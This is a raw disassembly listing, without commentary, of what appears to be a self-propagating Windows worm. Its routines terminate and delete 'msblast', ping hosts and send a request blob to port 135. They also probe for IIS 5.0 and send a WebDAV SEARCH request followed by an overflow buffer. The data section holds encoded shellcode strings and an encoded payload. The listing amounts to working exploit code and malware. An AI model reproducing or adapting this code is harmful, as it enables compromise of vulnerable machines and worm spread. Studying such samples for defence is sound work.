; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402970 proc near ; CODE XREF: sub_401280+4E�p
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, dword_4040A8
lea eax, [ebp+var_10C]
push 104h
push eax
push 0
call esi ; dword_4040A8
lea ecx, [ebp+var_10C]
push ecx
call dword_404074 ; GetFileAttributesA
test al, 1
jz short loc_4029B1
and al, 0FEh
lea edx, [ebp+var_10C]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_4029B1: ; CODE XREF: sub_402970+2F�j
push 0
call dword_40407C ; GetModuleHandleA
lea ecx, [ebp+var_210]
push 104h
push ecx
push eax
mov [ebp+var_4], eax
call esi ; dword_4040A8
push 4
call dword_4040E0 ; CloseHandle
lea eax, [ebp+var_210]
push 0
push 0
push eax
push dword_4040BC
push [ebp+var_4]
push dword_4040E8
push dword_404080
retn
sub_402970 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A00 proc near ; CODE XREF: sub_401280+1E�p
; sub_401280+1D9�p
var_108 = byte ptr -108h
var_107 = byte ptr -107h
sub esp, 108h
push esi
push edi
push offset aMsblast ; "msblast"
call sub_401000
add esp, 4
test eax, eax
jz short loc_402A48
push eax
push 0
push 1F0FFFh
call dword_404070 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_402A48
push 1
push esi
call dword_4040AC ; TerminateProcess
push 1388h
call dword_4040C8 ; Sleep
push esi
call dword_4040E0 ; CloseHandle
loc_402A48: ; CODE XREF: sub_402A00+17�j
; sub_402A00+2B�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+110h+var_107]
mov [esp+110h+var_108], 0
rep stosd
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+114h+var_108]
push offset aSMsblast_exe ; "%s\\msblast.exe"
push eax
call dword_40411C ; sprintf
add esp, 0Ch
lea ecx, [esp+110h+var_108]
push ecx
call dword_404074 ; GetFileAttributesA
pop edi
pop esi
test al, 1
jz short loc_402A91
and al, 0FEh
lea edx, [esp+108h+var_108]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_402A91: ; CODE XREF: sub_402A00+81�j
lea eax, [esp+108h+var_108]
push eax
call dword_4040E8 ; DeleteFileA
add esp, 108h
retn
sub_402A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_402B20+26�p
; sub_402C40+27�p
arg_0 = dword ptr 4
push esi
push edi
call sub_403122 ; IcmpCreateFile
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_402AC3
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AC3: ; CODE XREF: sub_402AB0+C�j
push 5Ch
push 40h
call dword_404068 ; GlobalAlloc
mov esi, eax
test esi, esi
jnz short loc_402ADE
push edi
call sub_40311C ; IcmpCloseHandle
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402AB0+21�j
mov eax, [esp+8+arg_0]
push ebx
push 7D0h
push 5Ch
push esi
push 0
push 40h
push offset dword_406430
push eax
push edi
mov dword ptr [esi+10h], offset dword_406430
mov word ptr [esi+0Ch], 40h
call sub_403116 ; IcmpSendEcho
push esi
mov ebx, eax
call dword_40406C ; GlobalFree
push edi
call sub_40311C ; IcmpCloseHandle
mov eax, ebx
pop ebx
pop edi
pop esi
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B20 proc near ; DATA XREF: sub_401470+F0�o
var_414 = word ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_3FC = byte ptr -3FCh
arg_0 = dword ptr 4
sub esp, 414h
push ebp
push esi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+41Ch+var_414], 0BB8h
mov ebp, [esp+41Ch+arg_0]
mov esi, [ebp+0]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402C17
push 87h
mov word ptr [esp+420h+var_410], 2
mov [esp+420h+var_40C], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+428h+var_410+2], ax
call dword_404150 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_402C17
push ebx
push edi
lea eax, [esp+424h+var_410]
push 10h
push eax
push esi
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
mov ebx, dword_404168
push 0
push 48h
push offset dword_405434
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
lea ecx, [esp+420h+var_410]
push 4
push ecx
push 1006h
push 0FFFFh
push esi
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+424h+var_3FC]
push 3E8h
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
test eax, eax
jz short loc_402C0E
mov eax, dword_406420
push 0
push eax
push offset dword_406470
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
push 0
lea ecx, [esp+424h+var_3FC]
push 400h
push ecx
push esi
call edi ; dword_40416C
loc_402C0E: ; CODE XREF: sub_402B20+7B�j
; sub_402B20+92�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop ebx
loc_402C17: ; CODE XREF: sub_402B20+30�j
; sub_402B20+62�j
test ebp, ebp
jz short loc_402C24
push ebp
call sub_402FC6
add esp, 4
loc_402C24: ; CODE XREF: sub_402B20+F9�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
pop esi
xor eax, eax
pop ebp
add esp, 414h
retn 4
sub_402B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C40 proc near ; DATA XREF: sub_401470+E1�o
var_5AC = word ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_594 = byte ptr -594h
var_574 = byte ptr -574h
var_2B8 = byte ptr -2B8h
arg_0 = dword ptr 4
sub esp, 5ACh
push ebx
push ebp
push esi
push edi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+5BCh+var_5AC], 0BB8h
mov eax, [esp+5BCh+arg_0]
mov esi, [eax]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402EC5
push 50h
mov word ptr [esp+5C0h+var_5A8], 2
mov [esp+5C0h+var_5A4], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+5C8h+var_5A8+2], ax
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
push esi
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esp+5B8h+var_594]
repne scasb
not ecx
sub edi, ecx
push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n\r\n"
mov eax, ecx
mov esi, edi
mov edi, edx
lea edx, [esp+5BCh+var_574]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+5BCh+var_594]
push ecx
push offset aGetHttp1_1Acce ; "GET / HTTP/1.1\r\nAccept: image/gif, imag"...
push offset aSSS ; "%s%s%s"
push edx
call dword_40411C ; sprintf
lea edi, [esp+5CCh+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 14h
repne scasb
not ecx
dec ecx
push 0
lea eax, [esp+5BCh+var_574]
push ecx
push eax
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
mov ebx, dword_404164
lea ecx, [esp+5B8h+var_5A8]
push 4
push ecx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea edx, [esp+5BCh+var_2B8]
push 2BBh
push edx
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz loc_402EBE
test eax, eax
jz loc_402EBE
mov [esp+eax+5B8h+var_2B8], 0
lea eax, [esp+5B8h+var_2B8]
push offset aServerMicrosof ; "Server: Microsoft-IIS/5.0"
push eax
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz loc_402EBE
push ebp
call dword_404170 ; closesocket
mov esi, dword_4040C8
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_594]
lea eax, [esp+5B8h+var_574]
push edx
push offset aSearchHttp1_1H ; "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n"
push eax
call dword_40411C ; sprintf
lea edi, [esp+5C4h+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
repne scasb
not ecx
dec ecx
push 0
push ecx
lea ecx, [esp+5C0h+var_574]
push ecx
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_5A8]
push 4
push edx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea eax, [esp+5BCh+var_2B8]
push 63h
push eax
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
test eax, eax
jz short loc_402EBE
lea ecx, [esp+5B8h+var_2B8]
push offset a411 ; "411"
push ecx
mov [esp+eax+5C0h+var_2B8], 0
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz short loc_402EBE
push ebp
call dword_404170 ; closesocket
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz short loc_402EC5
lea edx, [esp+5BCh+var_5A8]
push 10h
push edx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
push 64h
call esi ; dword_4040C8
mov edx, ds:dword_4075A0
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push edx
push ebp
call sub_402F50
add esp, 0Ch
push 0BB8h
call esi ; dword_4040C8
loc_402EBE: ; CODE XREF: sub_402C40+77�j
; sub_402C40+E9�j ...
push ebp
call dword_404170 ; closesocket
loc_402EC5: ; CODE XREF: sub_402C40+31�j
; sub_402C40+60�j ...
mov eax, [esp+5BCh+arg_0]
pop edi
pop esi
pop ebp
test eax, eax
pop ebx
jz short loc_402EDD
push eax
call sub_402FC6
add esp, 4
loc_402EDD: ; CODE XREF: sub_402C40+292�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
xor eax, eax
add esp, 5ACh
retn 4
sub_402C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F00 proc near ; CODE XREF: sub_401280+3C�p
; sub_401280+46�p
arg_0 = dword ptr 4
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jz short loc_402F4B
mov eax, [esp+8+arg_0]
push 0F01FFh
push eax
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402F38
push edi
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402F00+2C�j
push esi
call dword_40400C ; DeleteService
push esi
mov esi, dword_404034
call esi ; dword_404034
push edi
call esi ; dword_404034
loc_402F4B: ; CODE XREF: sub_402F00+15�j
pop edi
pop esi
retn
sub_402F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F50 proc near ; CODE XREF: sub_402C40+26F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+14h+arg_8]
xor ebx, ebx
cmp edi, ebx
mov [esp+14h+var_4], edi
mov [esp+14h+arg_8], ebx
jle short loc_402FA3
mov ebp, [esp+14h+arg_4]
loc_402F6B: ; CODE XREF: sub_402F50+51�j
mov ecx, [esp+14h+arg_0]
push 0
lea eax, [ebx+ebp]
push edi
push eax
push ecx
call dword_404168 ; send
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402FAD
test esi, esi
jnz short loc_402F9B
cmp [esp+14h+arg_8], 64h
jge short loc_402FAD
push 5
call dword_4040C8 ; Sleep
inc [esp+14h+arg_8]
loc_402F9B: ; CODE XREF: sub_402F50+36�j
sub edi, esi
add ebx, esi
test edi, edi
jg short loc_402F6B
loc_402FA3: ; CODE XREF: sub_402F50+15�j
mov eax, [esp+14h+var_4]
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_402FAD: ; CODE XREF: sub_402F50+32�j
; sub_402F50+3D�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
sub_402F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC0 proc near ; CODE XREF: sub_401280+8B�p
; sub_401470+9B�p ...
jmp dword_404108
sub_402FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC6 proc near ; CODE XREF: sub_401C80+1EA�p
; sub_402B20+FC�p ...
jmp dword_404138
sub_402FC6 endp
; ---------------------------------------------------------------------------
loc_402FCC: ; CODE XREF: seg001:004091B8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4041A8
push offset loc_403100
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
push 1
call dword_404128 ; __set_app_type
pop ecx
or ds:dword_4076BC, 0FFFFFFFFh
or ds:dword_4076C0, 0FFFFFFFFh
call dword_404124 ; __p__fmode
mov ecx, ds:dword_4076B8
mov [eax], ecx
call dword_404118 ; __p__commode
mov ecx, ds:dword_4076B4
mov [eax], ecx
mov eax, dword_404114
mov eax, [eax]
mov ds:dword_4076C4, eax
call nullsub_1
cmp dword_406414, 0
jnz short loc_40304F
push offset sub_4030FA
call dword_404110 ; __setusermatherr
pop ecx
loc_40304F: ; CODE XREF: seg000:00403041�j
call sub_4030E8
push offset dword_40500C
push offset dword_405008
call sub_4030E2 ; _initterm
mov eax, ds:dword_4076B0
mov [ebp-28h], eax
lea eax, [ebp-28h]
push eax
push ds:dword_4076AC
lea eax, [ebp-20h]
push eax
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
call dword_4040F8 ; __getmainargs
push offset dword_405004
push offset dword_405000
call sub_4030E2 ; _initterm
call dword_40410C ; __p___initenv
mov ecx, [ebp-20h]
mov [eax], ecx
push dword ptr [ebp-20h]
push dword ptr [ebp-2Ch]
push dword ptr [ebp-1Ch]
call sub_4011C0
add esp, 30h
mov [ebp-24h], eax
push eax
call dword_4040F0 ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_4030DC ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-30h]
call dword_404134 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030DC proc near ; CODE XREF: seg000:004030C8�p
jmp dword_4040F4
sub_4030DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030E2 proc near ; CODE XREF: seg000:0040305E�p
; seg000:00403091�p
jmp dword_4040FC
sub_4030E2 endp
; =============== S U B R O U T I N E =======================================
sub_4030E8 proc near ; CODE XREF: seg000:loc_40304F�p
push 30000h
push 10000h
call sub_403106 ; _controlfp
pop ecx
pop ecx
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
sub_4030FA proc near ; DATA XREF: seg000:00403043�o
xor eax, eax
retn
sub_4030FA endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_403100: ; DATA XREF: seg000:00402FD6�o
jmp dword_40412C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403106 proc near ; CODE XREF: sub_4030E8+A�p
jmp dword_404130
sub_403106 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403110 proc near ; CODE XREF: sub_4016E0+10�p
jmp dword_40419C
sub_403110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403116 proc near ; CODE XREF: sub_402AB0+53�p
jmp dword_404058
sub_403116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40311C proc near ; CODE XREF: sub_402AB0+24�p
; sub_402AB0+62�p
jmp dword_404050
sub_40311C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403122 proc near ; CODE XREF: sub_402AB0+2�p
jmp dword_404054
sub_403122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403128 proc near ; CODE XREF: sub_401000+C0�p
jmp dword_4040DC
sub_403128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40312E proc near ; CODE XREF: sub_401000+7C�p
jmp dword_4040D8
sub_40312E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403134 proc near ; CODE XREF: sub_401000+62�p
jmp dword_4040D4
sub_403134 endp
; ---------------------------------------------------------------------------
align 4
dd 3B1h dup(0)
dword_404000 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2Adword_404004 dd 77E377F9h ; resolved to->ADVAPI32.QueryServiceConfig2Adword_404008 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40400C dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_404010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_404014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_404018 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_40401C dd 77DE5EB8h ; resolved to->ADVAPI32.QueryServiceStatus ; sub_402540+17A�r ...
dword_404020 dd 77DF5462h ; resolved to->ADVAPI32.QueryServiceConfigAdword_404024 dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_404028 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_40402C dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_402540+11�r ...
dword_404030 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceAdword_404034 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4023E0+11D�r ...
dword_404038 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_402540+60�r ...
dword_40403C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_404040 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_404044 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_404048 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA align 10h
dword_404050 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandledword_404054 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_404058 dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEcho align 10h
dword_404060 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_404064 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_402C40+2A2�r
dword_404068 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_40406C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_404070 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_404074 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_402A00+77�r
dword_404078 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_402A00+8B�r
dword_40407C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_404080 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_404084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_404088 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_402C40+F�r
dword_40408C dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; sub_402540+7E�r
dword_404090 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_402540+1CF�r
dword_404094 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_404098 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40409C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4040A0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4040A4 dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4040A8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_402970+A�r
dword_4040AC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_402A00+30�r
dword_4040B0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4040B4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_401660+42�r
dword_4040B8 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_4040BC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_401990+A1�r ...
dword_4040C0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401B90+4C�r ...
dword_4040C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401470+F9�r ...
dword_4040C8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401280+6C�r ...
dword_4040CC dd 7C87109Dh ; resolved to->KERNEL32.FreeConsoledword_4040D0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4040D4 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4040D8 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_4040DC dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_4040E0 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401000+E1�r ...
dword_4040E4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4040E8 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401780+1D3�r ...
align 10h
dword_4040F0 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_4040F4 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_4040F8 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_4040FC dd 77C39D67h ; resolved to->MSVCRT._inittermdword_404100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_401B90+80�r ...
dword_404104 dd 77C371BCh ; resolved to->MSVCRT.sranddword_404108 dd 77C29CC5h dword_40410C dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenvdword_404110 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_404114 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_404118 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_40411C dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_4015E0+E�r ...
dword_404120 dd 77C47BE0h ; resolved to->MSVCRT.strrchrdword_404124 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_404128 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_40412C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_404130 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfpdword_404134 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_404138 dd 77C29CDDh dword_40413C dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_401280+12B�r ...
dword_404140 dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; sub_4023E0+64�r
align 8
dword_404148 dd 7E45A045h ; resolved to->USER32.ExitWindowsEx align 10h
dword_404150 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_402B20+57�r ...
dword_404154 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_402C40+6E�r ...
dword_404158 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40415C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_402C40+7E�r
dword_404160 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_401EA0+1B�r
dword_404164 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_401C80+41�r ...
dword_404168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401B90+1E�r ...
dword_40416C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401B90+65�r ...
dword_404170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_401990+15D�r ...
dword_404174 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4020E0+7�r ...
dword_404178 dd 71AB3E00h ; resolved to->WS2_32.binddword_40417C dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_404180 dd 71AB88D3h ; resolved to->WS2_32.listendword_404184 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_401990+137�r
dword_404188 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_401990+20�r
dword_40418C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_404190 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_404194 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4020E0+27�r ...
dd 0
dword_40419C dd 42D779A3h dd 2 dup(0)
dword_4041A8 dd 0FFFFFFFFh, 4030BCh, 4030D0h, 393h dup(0)dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 aU5390U665eU66a db '%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f%u66ad%u4e3d%u740'
; DATA XREF: sub_401F30+A4�o
db '0%u9023%u612c%u5090%u6659%u90ad%u612c%u548d%u7088%u548d%u908a%u54'
db '8d%u708a%u548d%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3%u6'
db '099',0
align 4
aFfilomidomfafd db 'ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpai'
; DATA XREF: sub_401F30+C6�o
db 'nlnpeppppppgekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppilefpaid'
db 'oiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdne'
db 'oeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihfokppog'
db 'olpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoih'
db 'hppppppcececece',0
align 10h
aU5951U6858U759 db '%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759'
; DATA XREF: sub_401F30+45�o
db 'f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u68'
db '58%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018',0
align 4
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
word_40537C dw 3D30h ; DATA XREF: sub_401280+19D�r
dw 3D9Fh
dd 3D8B3D8Ah, 3D953D91h, 3D9D3D97h, 3DBC3DA1h, 3DE93DF3h
dd 0DCA03D9Ah, 0CA64CA60h, 0CA68CA67h, 0CA71CA66h, 0CB5DCA82h
dd 0CBD0CA62h, 0D20CCBCFh, 0D235D22Ah, 0D344D248h, 0D354D357h
dd 0D360D35Ch, 0D353D362h, 0D3A1D35Fh, 0D3A3D3A2h, 0D39CD390h
dd 0DA6DD39Eh, 0DA05DA04h, 0DA47DA11h, 0DA6ADA00h, 0DB91DAC7h
dd 0DA06DA08h, 0DA58DA3Fh, 0DA45DA59h, 0DA4BDA3Fh, 0DA68DA55h
dd 0DB8ADAC5h, 0DBEADBDEh, 0DCA0DC6Dh, 0DC75DCA3h, 0DCB9DCA2h
dd 0DC71DCBAh, 0DCA6DC70h
off_405414 dd offset aHttpDownload_m ; DATA XREF: sub_401780:loc_4018AF�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_1 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_2 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_3 ; "http://download.microsoft.com/download/"...
off_405424 dd offset aHttpDownload_0 ; DATA XREF: sub_401780+120�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_4 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_5 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_6 ; "http://download.microsoft.com/download/"...
dword_405434 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
